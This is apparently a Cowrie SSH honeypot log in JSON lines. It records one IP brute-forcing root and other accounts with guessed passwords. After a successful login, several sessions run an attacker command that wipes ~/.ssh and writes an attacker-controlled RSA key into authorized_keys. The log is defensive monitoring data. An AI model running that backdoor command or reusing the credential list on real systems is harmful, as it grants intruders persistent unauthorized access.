{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:34:10.405006Z","src_ip":"212.227.235.229","session":"d82ee85d8544"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:34:11.728195Z","src_ip":"212.227.235.229","session":"d82ee85d8544"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:34:12.050148Z","src_ip":"212.227.235.229","session":"d82ee85d8544"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:34:12.066312Z","src_ip":"212.227.235.229","session":"8dc896b1346c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42706,"dst_ip":"1.2.3.4","dst_port":22,"session":"782fe1565d18","protocol":"ssh","message":"New connection: 212.227.235.229:42706 (1.2.3.4:22) [session: 782fe1565d18]","sensor":"my-vps","timestamp":"2025-09-08T22:34:13.044353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:34:13.046056Z","src_ip":"212.227.235.229","session":"782fe1565d18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:34:13.367204Z","src_ip":"212.227.235.229","session":"782fe1565d18"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T22:34:14.683784Z","src_ip":"212.227.235.229","session":"782fe1565d18"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:34:16.004809Z","src_ip":"212.227.235.229","session":"782fe1565d18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44430,"dst_ip":"1.2.3.4","dst_port":22,"session":"c74332a5b3a9","protocol":"ssh","message":"New connection: 212.227.235.229:44430 (1.2.3.4:22) [session: c74332a5b3a9]","sensor":"my-vps","timestamp":"2025-09-08T22:34:44.064882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:34:44.065638Z","src_ip":"212.227.235.229","session":"c74332a5b3a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:34:44.377012Z","src_ip":"212.227.235.229","session":"c74332a5b3a9"}
{"eventid":"cowrie.login.failed","username":"mithun","password":"mithun","message":"login attempt [mithun/mithun] failed","sensor":"my-vps","timestamp":"2025-09-08T22:34:45.624391Z","src_ip":"212.227.235.229","session":"c74332a5b3a9"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:34:46.938793Z","src_ip":"212.227.235.229","session":"c74332a5b3a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47456,"dst_ip":"1.2.3.4","dst_port":22,"session":"ead1a32a578c","protocol":"ssh","message":"New connection: 212.227.235.229:47456 (1.2.3.4:22) [session: ead1a32a578c]","sensor":"my-vps","timestamp":"2025-09-08T22:34:48.719244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:34:48.722431Z","src_ip":"212.227.235.229","session":"ead1a32a578c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:34:48.812351Z","src_ip":"212.227.235.229","session":"ead1a32a578c"}
{"eventid":"cowrie.login.success","username":"root","password":"7758258","message":"login attempt [root/7758258] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:34:49.136568Z","src_ip":"212.227.235.229","session":"ead1a32a578c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:34:49.382207Z","src_ip":"212.227.235.229","session":"ead1a32a578c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:34:49.382942Z","src_ip":"212.227.235.229","session":"ead1a32a578c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:34:49.384032Z","src_ip":"212.227.235.229","session":"ead1a32a578c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:34:49.480297Z","src_ip":"212.227.235.229","session":"ead1a32a578c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:34:49.668596Z","src_ip":"212.227.235.229","session":"ead1a32a578c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:34:49.669261Z","src_ip":"212.227.235.229","session":"ead1a32a578c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:34:49.762062Z","src_ip":"212.227.235.229","session":"ead1a32a578c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:34:49.762908Z","src_ip":"212.227.235.229","session":"ead1a32a578c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17980,"dst_ip":"1.2.3.4","dst_port":22,"session":"be04c2c0955f","protocol":"ssh","message":"New connection: 212.227.235.229:17980 (1.2.3.4:22) [session: be04c2c0955f]","sensor":"my-vps","timestamp":"2025-09-08T22:34:49.854877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:34:49.860650Z","src_ip":"212.227.235.229","session":"be04c2c0955f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:34:49.967173Z","src_ip":"212.227.235.229","session":"be04c2c0955f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:34:50.322124Z","src_ip":"212.227.235.229","session":"be04c2c0955f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:34:51.404418Z","src_ip":"212.227.235.229","session":"be04c2c0955f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17994,"dst_ip":"1.2.3.4","dst_port":22,"session":"7edccbb63cbe","protocol":"ssh","message":"New connection: 212.227.235.229:17994 (1.2.3.4:22) [session: 7edccbb63cbe]","sensor":"my-vps","timestamp":"2025-09-08T22:34:52.511426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:34:52.516429Z","src_ip":"212.227.235.229","session":"7edccbb63cbe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:34:52.597541Z","src_ip":"212.227.235.229","session":"7edccbb63cbe"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:34:52.958984Z","src_ip":"212.227.235.229","session":"7edccbb63cbe"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:34:53.061267Z","src_ip":"212.227.235.229","session":"ead1a32a578c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:34:53.062242Z","src_ip":"212.227.235.229","session":"7edccbb63cbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44234,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1e92badb67e","protocol":"ssh","message":"New connection: 212.227.235.229:44234 (1.2.3.4:22) [session: c1e92badb67e]","sensor":"my-vps","timestamp":"2025-09-08T22:34:57.685951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:34:57.686615Z","src_ip":"212.227.235.229","session":"c1e92badb67e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:34:57.917292Z","src_ip":"212.227.235.229","session":"c1e92badb67e"}
{"eventid":"cowrie.login.failed","username":"lsfadmin","password":"lsfadmin123","message":"login attempt [lsfadmin/lsfadmin123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:34:58.880700Z","src_ip":"212.227.235.229","session":"c1e92badb67e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:35:00.113718Z","src_ip":"212.227.235.229","session":"c1e92badb67e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50000,"dst_ip":"1.2.3.4","dst_port":22,"session":"96e96ed4026a","protocol":"ssh","message":"New connection: 212.227.235.229:50000 (1.2.3.4:22) [session: 96e96ed4026a]","sensor":"my-vps","timestamp":"2025-09-08T22:35:17.596697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:35:17.597687Z","src_ip":"212.227.235.229","session":"96e96ed4026a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:35:17.835797Z","src_ip":"212.227.235.229","session":"96e96ed4026a"}
{"eventid":"cowrie.login.success","username":"root","password":"april","message":"login attempt [root/april] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:35:18.831339Z","src_ip":"212.227.235.229","session":"96e96ed4026a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:35:19.324317Z","src_ip":"212.227.235.229","session":"96e96ed4026a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:35:19.325008Z","src_ip":"212.227.235.229","session":"96e96ed4026a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:35:19.325757Z","src_ip":"212.227.235.229","session":"96e96ed4026a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:35:19.565437Z","src_ip":"212.227.235.229","session":"96e96ed4026a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:35:20.152566Z","src_ip":"212.227.235.229","session":"96e96ed4026a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd 